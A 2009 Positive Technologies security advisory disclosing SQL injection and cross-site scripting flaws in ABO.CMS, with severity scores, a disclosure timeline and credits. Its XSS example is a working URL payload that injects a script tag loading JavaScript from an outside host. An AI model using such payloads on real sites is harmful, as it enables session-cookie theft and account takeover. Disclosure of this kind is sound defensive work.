PT-2009-17: ABO.CMS Multiple Vulnerabilities

Affected Software

ABO.CMS
Versions prior to 5.1

Product Link:
http://abocms.ru

Severity Rating

Severity: High
Impact: SQL Injection, Cross-Site Scripting
Attack Vector: Remote

CVSS v2

Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)

CVE: not assigned

Software Description

ABO.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).

Vulnerability Description

Positive Technologies Research Team has discovered the following vulnerabilities in ABO.CMS:

A) SQL Injection

B) Cross-Site Scripting

A) SQL Injection

SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.

User input passed to the "news" parameter is not properly sanitized. This can allows remote attackers to execute arbitrary SQL commands via the "news" parameter.

Example:
http://[server]/about/news/?action=addtheme&news=SQL-code

B) Cross-Site Scripting

User input passed to the "fid" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:
http://[server]/forum/?action=rules&fid=1%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E&start=1

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.

Solution

Update to latest version.

Disclosure Timeline

02/03/2009 - Vendor is notified
03/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/04/2009 - Vendor releases fixed version and details
26/05/2009 - Public disclosure

Credits

This vulnerability was discovered by Dmitry Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.

References

http://en.securitylab.ru/lab/PT-2009-17
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp